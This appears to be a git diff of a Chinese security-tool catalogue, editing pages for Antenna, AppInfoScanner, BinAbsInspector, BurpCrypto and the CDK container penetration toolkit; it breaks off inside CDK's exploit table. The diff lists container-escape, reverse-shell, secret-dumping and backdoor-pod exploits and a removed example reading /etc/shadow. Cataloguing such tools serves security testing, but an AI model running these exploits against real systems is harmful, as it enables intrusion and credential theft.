-需求，帮助Antenna更方便的与漏洞扫描流程打通。如果您有推荐打通的项目，也可以在issue中提出来
-
-已加入Antenna_Inside项目
-
-| 项目名称       | 项目地址                                                                       |
-|------------|----------------------------------------------------------------------------|
-| EasyPen    | [https://github.com/lijiejie/EasyPen](https://github.com/lijiejie/EasyPen) |
-
-## 近期使用疑问解答
-
-#### 1、源码部署服务未启动，或者启动了DNS不好使
-
-回答: 该项目暂不推荐使用python3.7版本以下环境部署，请认真查看安装部署教程-源码部署部分，
-检查配置中项目路径与实际项目路径相同，启动后也可以尝试使用`supervisorctl status`
-查看各个组件运行状态
-
-#### 2、关于各类组件的使用说明以及能否再详细的进行说明自定义组件开发教程
-
-回答：文章将在Antenna博客不定时更新，基础文章已有，后续详细的也会有的，作者在加班加点的写，绝不会让各位师傅等太久
-
-#### 3、运行docker-compose命令后镜像构建时间过长
-
-1. 可尝试修改Dockerfile中制定相关下载源地址内容
-2. 可修改docker-compose文件中镜像,官方镜像已打包至dockerhub https://hub.docker.com/r/jihongjun/antenna/tags
-可尝试使用`docker pull jihongjun/antenna` 进行拉取
-
-#### 4、其他问题
-如果您遇到了其他问题可查阅项目issue进行寻找相关解决方案，如果发现并没有其他人遇到和您相关的问题，请新建issue，
-作者会及时回答您的疑问
-
-## 相关教程链接
-
-## 最新公告
-
-DNS_REBINDING 功能演示:[Antenna v1.3.0 版本更新公告(含DNS REBINDING使用教程)](http://blog.antenna.cool/blog/V1.3.0%20update)
-
-### 关于部署
-
-基础部署教程:[安装部署](http://blog.antenna.cool/docs/intro)
-
-隐匿部署教程：[关于Antenna的隐匿性部署](http://blog.antenna.cool/blog/%20%20Secrecy)
-
-前后端分离部署 [Antenna的前后端分离部署](http://blog.antenna.cool/blog/client_server)
-
-### 关于配置
-
-基础配置教程:[基础配置教程](http://blog.antenna.cool/docs/%E5%85%B3%E4%BA%8E%E9%85%8D%E7%BD%AE/config)
-
-域名配置及DNS相关配置:[域名配置及阿里云dns服务修改教程](http://blog.antenna.cool/docs/%E5%85%B3%E4%BA%8E%E9%85%8D%E7%BD%AE/DNS)
-
-开通邮箱通知以及邮箱授权码申请教程:[QQ邮箱授权码申请教程](https://service.mail.qq.com/cgi-bin/help?subtype=1&id=28&no=1001256)
-
-### 关于任务
-
-任务基础使用教程:[如何简单的使用任务](http://blog.antenna.cool/docs/%E5%85%B3%E4%BA%8E%E4%BB%BB%E5%8A%A1/task)
-
-### 关于组件
-
-组件基础使用教程:[Antenna的灵魂-组件Template](http://blog.antenna.cool/docs/%E5%85%B3%E4%BA%8E%E7%BB%84%E4%BB%B6/template)
-
-xss 组件使用教程:[xss组件使用教程](http://blog.antenna.cool/docs/%E5%85%B3%E4%BA%8E%E7%BB%84%E4%BB%B6/xss)
-
-组件开发教程:[如何编写Antenna组件](http://blog.antenna.cool/docs/%E5%85%B3%E4%BA%8E%E7%BB%84%E4%BB%B6/template_demo)
-
-自定义HTTP组件使用教程[自定义HTTP组件使用教程](http://blog.antenna.cool/docs/%E5%85%B3%E4%BA%8E%E7%BB%84%E4%BB%B6/custom_http)
-
-### 关于OPEN_API与CallBack
-
-OPEN_API与CallBack使用教程:[关于OPEN_API与CallBack](http://blog.antenna.cool/docs/api_back)
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-#### [v1.3.5] - 2023-04-21
-
-**更新**  
-- 修复HTTPS分块传输请求导致处理逻辑错误  
-- 废弃domain_in查询方式，后续多个域名查询可使用多个domain参数查询  
-- 新增api查询用户token以及查询当前项目使用版本接口
-
-#### [v1.3.4] - 2023-04-06
-
-**更新**  
-- 增加OPENAPI 消息ORDER_DESC 参数  
-- 优化了工具方法逻辑，修复了一些已知的问题  
-- 为Python SDK 做接口适配开发
-
-#### [v1.3.2] - 2023-03-01
-
-**更新**  
-- 优化了任务模块功能逻辑  
-- 修复python3.6版本不支持socket解析ip的bug
-
-#### [v1.3.1] - 2023-02-26
-
-**更新**  
-- Readme 新增DNS Rebinding功能演示文档，支持并优化了DNS 缓存的逻辑  
-- 优化了平台消息处理模块的逻辑，减少了数据库的请求数量  
-- 修复了平台配置的一些bug
-
-#### [v1.2.1] - 2022-10-19
-
-**更新**  
-- 优化HTTP/HTTPS请求处理模块，消息结果展示数据请求报文  
-- 修复组件模块bug，添加组件代码展示&编辑功能  
-- OPEN_API新增domain_contains、content_contains查询关键字  
-- 优化用户使用体验、更新配置无需再重启docker及系统  
-- 日常修复了一些bug
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/AppInfoScanner.md b/detail/AppInfoScanner.md
index a5c8d4f20..fc146d02e 100644
--- a/detail/AppInfoScanner.md
+++ b/detail/AppInfoScanner.md
@@ -3,7 +3,7 @@
 ![Language](https://img.shields.io/badge/Language-Python-blue)
 ![Author](https://img.shields.io/badge/Author-kelvinBen-orange)
 ![GitHub stars](https://img.shields.io/github/stars/kelvinBen/AppInfoScanner.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.0.9-red)
+![Version](https://img.shields.io/badge/Version-V1.0.8-red)
 ![Time](https://img.shields.io/badge/Join-20210120-green)
 <!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
 
@@ -354,13 +354,4 @@ method: 用于配置自动下载过程中需要的请求方法
 
 ## 最近更新
 
-#### [v1.0.9] - 2022-10-23
-
-**更新**  
-- 更新apktool为最新版本  
-- 优化部分环节流程  
-- 修复excle文件导出时超时行数限制  
-- 修复脚本执行时卡顿的问题  
-- 修复Mac下Playload文件权限不足的问题
-
 <!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/As-Exploits.md b/detail/As-Exploits.md
index e0574d6b0..e6a122398 100644
--- a/detail/As-Exploits.md
+++ b/detail/As-Exploits.md
@@ -38,7 +38,6 @@ Payload部分很多借鉴了[冰蝎](https://github.com/rebeyond/Behinder)跟[
 <!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
 ## 项目相关
 
-- 2021-11-18 发布文章[《As-Exploits：中国蚁剑后渗透框架》](https://mp.weixin.qq.com/s/ofeoMTqaJgZcc37JQVYoeg)
 
 ## 最近更新
 
diff --git a/detail/BinAbsInspector.md b/detail/BinAbsInspector.md
deleted file mode 100644
index 8faf0d636..000000000
--- a/detail/BinAbsInspector.md
+++ /dev/null
@@ -1,125 +0,0 @@
-## BinAbsInspector <https://github.com/KeenSecurityLab/BinAbsInspector>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Java-blue)
-![Author](https://img.shields.io/badge/Author-KeenSecurityLab-orange)
-![GitHub stars](https://img.shields.io/github/stars/KeenSecurityLab/BinAbsInspector.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.1-red)
-![Time](https://img.shields.io/badge/Join-20220615-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-# What is  BinAbsInspector?
-
-BinAbsInspector (Binary Abstract Inspector) is a static analyzer for automated reverse engineering and scanning vulnerabilities in binaries, which is a long-term research project incubated at [Keenlab](https://keenlab.tencent.com/). It is based on abstract interpretation with the support from Ghidra. It works on Ghidra's Pcode instead of assembly. Currently it supports binaries on x86,x64, armv7 and aarch64. 
-
-# Installation
-+ Install Ghidra according to [Ghidra's documentation](https://github.com/NationalSecurityAgency/ghidra#install)
-+ Install [Z3](https://github.com/Z3Prover/z3) (tested version: 4.8.15)
-+ Note that generally there are two parts for Z3 library: one is Java package, the other one is native library. The Java package is already included in "/lib" directory, but we suggest that you replace it with your own Java package for version compatibility.
-  + For Windows, download a pre-built package from [here](https://github.com/Z3Prover/z3/releases), extract the zip file and add a PATH environment variable pointing to `z3-${version}-win/bin`
-  + For Linux, install with package manager is NOT recommended, there are two options:
-    1. You can download suitable pre-build package from [here](https://github.com/Z3Prover/z3/releases), extract the zip file and copy `z3-${version}-win/bin/*.so` to `/usr/local/lib/`
-    2. or you can build and install z3 according to [Building Z3 using make and GCC/Clang](https://github.com/Z3Prover/z3#building-z3-using-make-and-gccclang)
-  + For MacOS, it is similar to Linux.
-+ Download the extension zip file from [release page](https://github.com/KeenSecurityLab/BinAbsInspector/releases)
-+ Install the extension according to [Ghidra Extension Notes](https://ghidra-sre.org/InstallationGuide.html#GhidraExtensionNotes)
-
-# Building
-Build the extension by yourself, if you want to develop a new feature, please refer to [development guide](https://github.com/KeenSecurityLab/BinAbsInspector/wiki/Developer-Guide).
-+ Install Ghidra and Z3
-+ Install [Gradle 7.x](https://gradle.org/releases/) (tested version: 7.4)
-+ Pull the repository
-+ Run `gradle buildExtension` under repository root
-+ The extension will be generated at `dist/${GhidraVersion}_${date}_BinAbsInspector.zip` 
-
-# Usage
-You can run BinAbsInspector in headless mode, GUI mode, or with docker.
-
-+ With Ghidra headless mode.
-```
-$GHIDRA_INSTALL_DIR/support/analyzeHeadless <projectPath> <projectName> -import <file> -postScript BinAbsInspector "@@<scriptParams>"
-```
-`<projectPath>`   --   Ghidra project path.  
-`<projectName>`   --   Ghidra project name.  
-`<scriptParams>`  --   The argument for our analyzer, provides following options:
-
-| Parameter                                 | Description                           |
-| ----------------------------------------- | --------------------------------------|
-| `[-K <kElement>]`                         | KSet size limit [K](https://github.com/KeenSecurityLab/BinAbsInspector/wiki/Technical-Details#kset)             |
-| `[-callStringK <callStringMaxLen>]`       | Call string maximum length [K](https://github.com/KeenSecurityLab/BinAbsInspector/wiki/Technical-Details#context)|
-| `[-Z3Timeout <timeout>]`                  | Z3 timeout                            |
-| `[-timeout <timeout>]`                    | Analysis timeout                      |
-| `[-entry <address>]`                      | Entry address                         |
-| `[-externalMap <file>]`                   | External function model config        |
-| `[-json]`                                 | Output in json format                 |
-| `[-disableZ3]`                            | Disable Z3                            |
-| `[-all]`                                  | Enable all checkers                   |
-| `[-debug]`                                | Enable debugging log output           |
-| `[-check "<cweNo1>[;<cweNo2>...]"]`       | Enable specific checkers              |
-
-+ With Ghidra GUI
-  1. Run Ghidra and import the target binary into a project
-  2. Analyze the binary with default settings
-  3. When the analysis is done, open `Window -> Script Manager` and find `BinAbsInspector.java`
-  4. Double-click on `BinAbsInspector.java` entry, set the parameters in configuration window and click OK
-  5. When the analysis is done, you can see the CWE reports in console window, double-click the addresses from the report can jump to corresponding address
-
-+ With Docker
-
-```shell
-git clone git@github.com:KeenSecurityLab/BinAbsInspector.git
-cd BinAbsInspector
-docker build . -t bai
-docker run -v $(pwd):/data/workspace bai "@@<script parameters>" -import <file>
-```
-
-# Implemented Checkers
-So far BinAbsInspector supports following checkers:
-
-+ [CWE78](https://cwe.mitre.org/data/definitions/78.html)  (OS Command Injection)
-+ [CWE119](https://cwe.mitre.org/data/definitions/119.html) (Buffer Overflow (generic case))
-+ [CWE125](https://cwe.mitre.org/data/definitions/125.html) (Buffer Overflow (Out-of-bounds Read))
-+ [CWE134](https://cwe.mitre.org/data/definitions/134.html) (Use of Externally-Controlled Format string)
-+ [CWE190](https://cwe.mitre.org/data/definitions/190.html) (Integer overflow or wraparound)
-+ [CWE367](https://cwe.mitre.org/data/definitions/367.html) (Time-of-check Time-of-use (TOCTOU))
-+ [CWE415](https://cwe.mitre.org/data/definitions/415.html) (Double free)
-+ [CWE416](https://cwe.mitre.org/data/definitions/416.html) (Use After Free)
-+ [CWE426](https://cwe.mitre.org/data/definitions/426.html) (Untrusted Search Path)
-+ [CWE467](https://cwe.mitre.org/data/definitions/467.html) (Use of sizeof() on a pointer type)
-+ [CWE476](https://cwe.mitre.org/data/definitions/476.htmll) (NULL Pointer Dereference)
-+ [CWE676](https://cwe.mitre.org/data/definitions/676.html) (Use of Potentially Dangerous Function)
-+ [CWE787](https://cwe.mitre.org/data/definitions/787.html) (Buffer Overflow (Out-of-bounds Write))
-
-# Project Structure
-The structure of this project is as follows, please refer to [technical details](https://github.com/KeenSecurityLab/BinAbsInspector/wiki/Technical-Details) for more details.
-```
-├── main
-│   ├── java
-│   │   └── com
-│   │       └── bai
-│   │           ├── checkers                       checker implementatiom
-│   │           ├── env
-│   │           │   ├── funcs                      function modeling
-│   │           │   │   ├── externalfuncs          external function modeling
-│   │           │   │   └── stdfuncs               cpp std modeling
-│   │           │   └── region                     memory modeling
-│   │           ├── solver                         analyze core and grpah module
-│   │           └── util                           utilities
-│   └── resources
-└── test
-```
-You can also build the javadoc with `gradle javadoc`, the API documentation will be generated in `./build/docs/javadoc`.
-
-# Acknowledgement
-We employ [Ghidra](https://ghidra-sre.org/) as our foundation and frequently leverage [JImmutable Collections](http://brianburton.github.io/java-immutable-collections/) for better performance.  
-Here we would like to thank them for their great help!
-
-
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-- 2022-06-22 发布文章[《BinAbsInspector：二进制文件自动化静态漏洞检测工具》](https://mp.weixin.qq.com/s/KBpkRvkq91mjkS_4QD3yjQ)
-
-## 最近更新
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/BurpCrypto.md b/detail/BurpCrypto.md
deleted file mode 100644
index 7c7a85fbe..000000000
--- a/detail/BurpCrypto.md
+++ /dev/null
@@ -1,59 +0,0 @@
-## BurpCrypto <https://github.com/whwlsfb/BurpCrypto>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Java-blue)
-![Author](https://img.shields.io/badge/Author-whwlsfb-orange)
-![GitHub stars](https://img.shields.io/github/stars/whwlsfb/BurpCrypto.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.1-red)
-![Time](https://img.shields.io/badge/Join-20211122-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-Burpcrypto is a collection of burpsuite encryption plug-ins, supporting AES/RSA/DES/ExecJs(execute JS encryption code in burpsuite).
-
-# Build
-`$ mvn package`
-# Usage
-[中文使用说明](https://blog.wanghw.cn/burpcrypto)
-
-- Download the precompiled jar package from [Releases](https://github.com/whwlsfb/BurpCrypto/releases).
-- Add this jar package to your burpsuite's Extensions.
-- Switch to BurpCrypto tab, select you need Cipher tab.
-- Set key or some value.
-- press "Add processor", and give a name for this processor.
-- Switch to Intruder->Payloads->Payload Processing.
-- press "Add", select "Invoke Burp extension", and select processor you just created.
-- press "Start attack", have fun!
-
-## Key Example
-
-- Aes Key(UTF8String): abcdefgabcdefg12
-- Aes IV(UTF8String): abcdefgabcdefg12
-- Rsa X509 Key: MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCC0hrRIjb3noDWNtbDpANbjt5Iwu2NFeDwU16Ec87ToqeoIm2KI+cOs81JP9aTDk/jkAlU97mN8wZkEMDr5utAZtMVht7GLX33Wx9XjqxUsDfsGkqNL8dXJklWDu9Zh80Ui2Ug+340d5dZtKtd+nv09QZqGjdnSp9PTfFDBY133QIDAQAB
-- Rsa Modulus: ca27d90f03753cbbc9958011baf701ac99305b63f68e26ab5617593e01d2fb519127fb87bafbe6e0472ec3a038575fa292adadbc79390a955a61b29431f78f4734773048a45dcf100e23cabf2df11a55aa90cd6b024a44eed1096c3b9e1408d46aae54d7291b82fe4b7867c5eaa45e9cc0ba7f7ae3e5593337c7dcbace2d02ed2fbbff26c6df8a32bb26be80603fcd94c6c8dbd67878d77b37fedcf808e3d8f469aaa7c65d033d547a5c8ea9bdd5c89b836c65852f355a5efd9c7137a186a62b5eb0e052c8be3096d3b51133f8a8c108292a296c99d37bad42bcc3f6c39fa5e583582942b4fc4e7ff4b6779fff5bbaddc65b19c7c57d8cdb39b1a994e08d4a2f50793d8f707d069c380baf0f64bfdce3b35d0b5c5c59348a35a082012aaf4991080abf518b55787969ff24186cb95f7e7218c904cf1dcaeb5bed723e305b83f2e85d6f116d2c7400f9e49d904db8a5a3a0701cdb579fbf3128511acd0f789ece1233ed926d705b3b0dfa34bf33f5ae4bdc611a602aa03aaae13400bc7ad3813ea4474dc62de3d0cb1f5aac277d895a75d38f9b920938fa6b1de35bd6132798c122403c685bdb6e5e24bbd70cfb3e968da0b8affd398e539e7c1e7add09891780bcbd278f3900499ae09cee0dc62e3f92e70001bab6d46261d2801a37f80d84d0e39fce6eaedf106a61b5961960641b9db0e4e23c770e6370ac5d61c6c9eb0f07
-- Rsa Exponent: 010001
-- DES Key: 12345678
-- DESede Key: 123456781234567812345678
-
-
-## Screenshots
-
-AES Example:
-
-![](https://github.com/whwlsfb/BurpCrypto/raw/master/screenshot/aes.gif)
-
-ExecJs Example (Here is the modified MD5 algorithm):
-
-![](https://github.com/whwlsfb/BurpCrypto/raw/master/screenshot/execjs.gif)
-
-Quick Crypto:
-
-![](https://github.com/whwlsfb/BurpCrypto/raw/master/screenshot/quick_crypto.gif)
-
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-- 2021-11-25 发布文章[《BurpCrypto : 万能网站密码爆破测试工具》](https://mp.weixin.qq.com/s/-paMF8IepVUue7HyVHiLmw)
-
-## 最近更新
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/CDK.md b/detail/CDK.md
index 1073defda..7d5592b50 100644
--- a/detail/CDK.md
+++ b/detail/CDK.md
@@ -1,17 +1,12 @@
 ## CDK <https://github.com/cdk-team/CDK>
 <!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Golang-blue)
+![Language](https://img.shields.io/badge/Language-CDK-blue)
 ![Author](https://img.shields.io/badge/Author-cdkteam-orange)
 ![GitHub stars](https://img.shields.io/github/stars/cdk-team/CDK.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.5.2-red)
+![Version](https://img.shields.io/badge/Version-V1.0.4-red)
 ![Time](https://img.shields.io/badge/Join-20210223-green)
 <!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
 
-# CDK - Zero Dependency Container Penetration Toolkit
-
-English | [简体中文](https://github.com/cdk-team/CDK/wiki/CDK-Home-CN)
-
-![png](https://user-images.githubusercontent.com/7868679/177925206-8d83dc95-0f2f-4d61-9a45-0d43b1b0468f.png)
 
 ## Legal Disclaimer
 
@@ -22,28 +17,6 @@ CDK is for security testing purposes only.
 
 CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you to escape container and take over K8s cluster easily.
 
-## Quick Start
-
-Run **`cdk eva`** to get evaluate info and a recommend exploit, then run **`cdk run`** to start the attack.
-
-```
-> ./cdk eva --full
-
-[*] Maybe you can exploit the *Capabilities* below:
-[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
-[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
-Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
-Critical - Possible Privileged Container Found.
-
-> ./cdk run cap-dac-read-search
-
-Running with target: /etc/shadow, ref: /etc/hostname
-ubuntu:$6$*******:19173:0:99999:7:::
-root:*:18659:0:99999:7:::
-daemon:*:18659:0:99999:7:::
-bin:*:18659:0:99999:7:::
-```
-
 ## Installation/Delivery
 
 Download latest release in https://github.com/cdk-team/CDK/releases/
@@ -73,6 +46,7 @@ chmod a+x cdk
 Usage:
   cdk evaluate [--full]
   cdk run (--list | <exploit> [<args>...])
+  cdk auto-escape <cmd>
   cdk <tool> [<args>...]
 
 Evaluate:
@@ -92,7 +66,6 @@ Tool:
   nc [options]                              Create TCP tunnel.
   ifconfig                                  Show network information.
   kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
-  ectl <endpoint> get <key>                 Unauthorized enumeration of ectd keys.
   ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
   probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000
 
@@ -128,7 +101,6 @@ This command will run the scripts below without local file scanning, using `--fu
 |Information Gathering|Sensitive Process|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Services)|
 |Information Gathering|Sensitive Local Files|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Sensitive-Files)|
 |Information Gathering|Kube-proxy Route Localnet(CVE-2020-8558)|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-check-net.ipv4.conf.all.route_localnet)|
-|Information Gathering|DNS-Based Service Discovery|✔|[link](https://github.com/kubernetes/dns/blob/master/docs/specification.md)|
 |Discovery|K8s Api-server Info|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-K8s-API-Server)|
 |Discovery|K8s Service-account Info|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-K8s-Service-Account)|
 |Discovery|Cloud Provider Metadata API|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Cloud-Provider-Metadata-API)|
@@ -145,37 +117,34 @@ Run targeted exploit:
 cdk run <script-name> [options]
 ```
 
-| Tactic               | Technique                                                  | CDK Exploit Name       | Supported | In Thin                                                                    | Doc                                                                                  |
-|----------------------|------------------------------------------------------------|------------------------|-----------|----------------------------------------------------------------------------|--------------------------------------------------------------------------------------|
-| Escaping             | docker-runc CVE-2019-5736                                  | runc-pwn               | ✔         | ✔                                                                          ||
-| Escaping             | containerd-shim CVE-2020-15257                             | shim-pwn               | ✔         || [link](https://github.com/cdk-team/CDK/wiki/Exploit:-shim-pwn)             |
-| Escaping             | docker.sock PoC (DIND attack)                              | docker-sock-check      | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-check)              |
-| Escaping             | docker.sock RCE                                            | docker-sock-pwn        | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-pwn)                |
-| Escaping             | Docker API(2375) RCE                                       | docker-api-pwn         | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-api-pwn)                 |
-| Escaping             | Device Mount Escaping                                      | mount-disk             | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-mount-disk)                     |
-| Escaping             | LXCFS Escaping                                             | lxcfs-rw               | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-lxcfs-rw)                       |
-| Escaping             | Cgroups Escaping                                           | mount-cgroup           | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-mount-cgroup)                   |
-| Escaping             | Abuse Unprivileged User Namespace Escaping  CVE-2022-0492  | abuse-unpriv-userns    | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-abuse-unpriv-userns)            |
-| Escaping             | Procfs Escaping                                            | mount-procfs           | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-mount-procfs)                   |
-| Escaping             | Ptrace Escaping PoC                                        | check-ptrace           | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-check-ptrace)                   |
-| Escaping             | Rewrite Cgroup(devices.allow)                              | rewrite-cgroup-devices | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-rewrite-cgroup-devices)         |
-| Escaping             | Read arbitrary file from host system (CAP_DAC_READ_SEARCH) | cap-dac-read-search    | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-cap-dac-read-search)            |
-| Discovery            | K8s Component Probe                                        | service-probe          | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-service-probe)                  |
-| Discovery            | Dump Istio Sidecar Meta                                    | istio-check            | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-check-istio)                    |
-| Discovery            | Dump K8s Pod Security Policies                             | k8s-psp-dump           | ✔         || [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-psp-dump)         |
-| Remote Control       | Reverse Shell                                              | reverse-shell          | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-reverse-shell)                  |
-| Remote Control       | Kubelet Exec                                               | kubelet-exec           | ✔         | ✔                                                                          |                  |
-| Credential Access    | Registry BruteForce                                        | registry-brute         | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-Container-Image-Registry-Brute) |
-| Credential Access    | Access Key Scanning                                        | ak-leakage             | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-ak-leakage)                     |
-| Credential Access    | Etcd Get K8s Token                                         | etcd-get-k8s-token     | ✔         | ✔                                                                          |                |
-| Credential Access    | Dump K8s Secrets                                           | k8s-secret-dump        | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-secret-dump)                |
-| Credential Access    | Dump K8s Config                                            | k8s-configmap-dump     | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-configmap-dump)             |
-| Privilege Escalation | K8s RBAC Bypass                                            | k8s-get-sa-token       | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-get-sa-token)               |
-| Persistence          | Deploy WebShell                                            | webshell-deploy        | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-webshell-deploy)                |
-| Persistence          | Deploy Backdoor Pod                                        | k8s-backdoor-daemonset | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-backdoor-daemonset)         |
-| Persistence          | Deploy Shadow K8s api-server                               | k8s-shadow-apiserver   | ✔         || [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-shadow-apiserver) |
-| Persistence          | K8s MITM Attack (CVE-2020-8554)                            | k8s-mitm-clusterip     | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Evaluate:-k8s-mitm-clusterip)            |
-| Persistence          | Deploy K8s CronJob                                         | k8s-cronjob            | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-cronjob)                    |
+|Tactic|Technique|CDK Exploit Name|Supported|In Thin|Doc|
+|---|---|---|---|---|---|
+|Escaping|docker-runc CVE-2019-5736|runc-pwn|✔|✔||
+|Escaping|containerd-shim CVE-2020-15257|shim-pwn|✔||[link](https://github.com/cdk-team/CDK/wiki/Exploit:-shim-pwn)|
+|Escaping|docker.sock PoC (DIND attack)|docker-sock-check|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-check)|
+|Escaping|docker.sock RCE|docker-sock-pwn|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-pwn)|
+|Escaping|Docker API(2375) RCE|docker-api-pwn|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-api-pwn)|
+|Escaping|Device Mount Escaping|mount-disk|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-mount-disk)|
+|Escaping|LXCFS Escaping|lxcfs-rw|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-lxcfs-rw)|
+|Escaping|Cgroups Escaping|mount-cgroup|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-mount-cgroup)|
+|Escaping|Procfs Escaping|mount-procfs|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-mount-procfs)|
+|Escaping|Ptrace Escaping PoC|check-ptrace|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-check-ptrace)|
+|Escaping|Rewrite Cgroup(devices.allow)|rewrite-cgroup-devices|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-rewrite-cgroup-devices)|
+|Escaping|Read arbitrary file from host system (CAP_DAC_READ_SEARCH)|cap-dac-read-search|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-cap-dac-read-search)|
+|Discovery|K8s Component Probe|service-probe|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-service-probe)|
+|Discovery|Dump Istio Sidecar Meta|istio-check|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-check-istio)|
+|Discovery|Dump K8s Pod Security Policies|k8s-psp-dump|✔||[link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-psp-dump)|
+|Remote Control|Reverse Shell|reverse-shell|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-reverse-shell)|
+|Credential Access|Registry BruteForce|registry-brute|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-Container-Image-Registry-Brute)|
+|Credential Access|Access Key Scanning|ak-leakage|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-ak-leakage)|
+|Credential Access|Dump K8s Secrets|k8s-secret-dump|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-secret-dump)|
+|Credential Access|Dump K8s Config|k8s-configmap-dump|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-configmap-dump)|
+|Privilege Escalation|K8s RBAC Bypass|k8s-get-sa-token|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-get-sa-token)|
+|Persistence|Deploy WebShell|webshell-deploy|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-webshell-deploy)|
